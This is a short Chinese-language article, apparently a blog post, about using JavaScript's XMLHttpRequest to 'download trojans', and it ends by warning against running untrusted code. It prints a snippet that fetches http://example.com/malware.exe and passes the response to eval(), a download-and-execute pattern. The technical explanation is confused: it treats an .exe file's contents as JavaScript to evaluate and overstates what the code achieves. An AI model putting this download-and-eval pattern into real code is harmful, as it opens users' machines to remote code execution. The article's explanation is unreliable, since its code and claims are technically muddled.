當提到木馬時，一般都會想到黑客們使用程序來竊取隱私信息或者實施其他的犯罪活動。然而，有些人也可能會想到通過JavaScript代碼下載木馬。事實上，JavaScript可以通過一些不安全的方式來下載木馬，而這種做法可能會導致嚴重的安全問題。

一個常見的方式是使用XMLHttpRequest對象。 這個對象通常被用來處理AJAX請求，但實際上它也可以用來下載文件。 看下面的JavaScript代碼段：

var req = new XMLHttpRequest();
req.open("GET", "http://example.com/malware.exe", false);
req.send(null);
if(req.status == 200) {
eval(req.responseText);
}

在上面的代碼中，我們使用XMLHttpRequest對象來下載一個名為“malware.exe”的文件。并且如果下載成功，就將返回的文本作為JavaScript代碼執行。事實上，這段代碼被廣泛使用，因為它可以將遠程代碼注入到客戶端系統中并且自動執行。

然而，這種方式十分危險，因為它會把代碼下載下來，解析它，并執行其中的腳本。這種方式可以讓攻擊者向用戶發送惡意代碼。一旦用戶下載并且運行這個木馬，黑客就可以掌控用戶的電腦了。

因此，在使用JavaScript時，必須非常小心。盡管在某些情況下，可能需要使用XMLHttpRequest來下載文件， 一般情況下，應該使用更好的方式來完成這個任務。最重要的是，不要下載不可信任的代碼，以免造成不必要的安全問題。